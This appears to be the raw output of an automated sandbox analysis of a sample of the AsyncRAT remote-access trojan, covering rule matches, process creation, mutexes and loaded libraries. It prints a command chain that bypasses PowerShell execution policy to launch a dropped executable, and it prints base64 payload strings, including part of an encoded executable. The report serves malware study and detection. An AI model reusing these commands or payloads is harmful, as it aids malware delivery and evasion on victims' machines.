                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06BD04800_2_06BD0480
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06BD04100_2_06BD0410
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06BD49B10_2_06BD49B1
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06BD4DE10_2_06BD4DE1
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06BD49C00_2_06BD49C0
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06C3A0000_2_06C3A000
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06C3A0100_2_06C3A010
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06C3A0100_2_06C3A010
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeCode function: 5_2_02CAD9DC5_2_02CAD9DC
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeCode function: 5_2_073270975_2_07327097
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeCode function: 5_2_073260C05_2_073260C0
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeCode function: 5_2_0732A1C15_2_0732A1C1
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeCode function: 11_2_012DA04711_2_012DA047
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeCode function: 11_2_012DA05811_2_012DA058
                    Source: AsyncClient.exe, 00000000.00000000.1429164611.000000000063E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStub.exe" vs AsyncClient.exe
                    Source: AsyncClient.exe, 00000000.00000002.3883921677.0000000002B51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLoader.exe. vs AsyncClient.exe
                    Source: AsyncClient.exe, 00000000.00000002.3890281185.00000000069C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSendFile.dll" vs AsyncClient.exe
                    Source: AsyncClient.exeBinary or memory string: OriginalFilenameStub.exe" vs AsyncClient.exe
                    Source: AsyncClient.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: AsyncClient.exe, type: SAMPLEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                    Source: AsyncClient.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 0.0.AsyncClient.exe.630000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                    Source: 0.0.AsyncClient.exe.630000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 11.2.hklugq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 5.2.hklugq.exe.3d93990.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 5.2.hklugq.exe.3d93990.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000000.00000000.1429164611.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 0000000B.00000002.3882310558.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000005.00000002.1648992753.0000000003D93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: Process Memory Space: AsyncClient.exe PID: 4300, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: Process Memory Space: hklugq.exe PID: 3800, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: Process Memory Space: hklugq.exe PID: 4268, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 0.2.AsyncClient.exe.3ae89a8.1.raw.unpack, kMtwg0o70HMbUjS709M9.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.AsyncClient.exe.3ae89a8.1.raw.unpack, kMtwg0o70HMbUjS709M9.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.AsyncClient.exe.69c0000.2.raw.unpack, kMtwg0o70HMbUjS709M9.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.AsyncClient.exe.69c0000.2.raw.unpack, kMtwg0o70HMbUjS709M9.csCryptographic APIs: 'CreateDecryptor'
                    Source: AsyncClient.exe, HZxunwjDMSGd.csBase64 encoded string: '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'
                    Source: hklugq.exe.0.dr, DarksProtectorD3eu6PcbZm91S53n53555a2377zss1P81R24r6j7M72O2H22m6MA283DarksProtector.csBase64 encoded string: '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
                    Source: 5.2.hklugq.exe.3d93990.0.raw.unpack, DarksProtector8Pp1MK442GTx44N6eUgCv6438Shs97x3F198R4L1Dq3D2325JDarksProtector.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 5.2.hklugq.exe.3d93990.0.raw.unpack, DarksProtector8Pp1MK442GTx44N6eUgCv6438Shs97x3F198R4L1Dq3D2325JDarksProtector.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: AsyncClient.exe, YuAbhMLrGUb.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: AsyncClient.exe, YuAbhMLrGUb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@15/14@2/5
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeFile created: C:\Users\user\AppData\Roaming\PIDJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_03
                    Source: C:\Users\user\Desktop\AsyncClient.exeMutant created: \Sessions\1\BaseNamedObjects\9mzImB3NUR0Q
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeMutant created: \Sessions\1\BaseNamedObjects\Mutex_25840020
                    Source: C:\Users\user\Desktop\AsyncClient.exeFile created: C:\Users\user\AppData\Local\Temp\hklugq.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess created: C:\Windows\explorer.exe
                    Source: unknownProcess created: C:\Windows\explorer.exe
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess created: C:\Windows\explorer.exeJump to behavior
                    Source: AsyncClient.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: AsyncClient.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\AsyncClient.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: AsyncClient.exeReversingLabs: Detection: 86%
                    Source: unknownProcess created: C:\Users\user\Desktop\AsyncClient.exe "C:\Users\user\Desktop\AsyncClient.exe"
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"' & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\hklugq.exe "C:\Users\user\AppData\Local\Temp\hklugq.exe"
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
                    Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /NoUACCheck
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess created: C:\Users\user\AppData\Local\Temp\hklugq.exe "C:\Users\user\AppData\Local\Temp\hklugq.exe"
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"' & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"' Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\hklugq.exe "C:\Users\user\AppData\Local\Temp\hklugq.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess created: C:\Users\user\AppData\Local\Temp\hklugq.exe "C:\Users\user\AppData\Local\Temp\hklugq.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: cryptnet.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
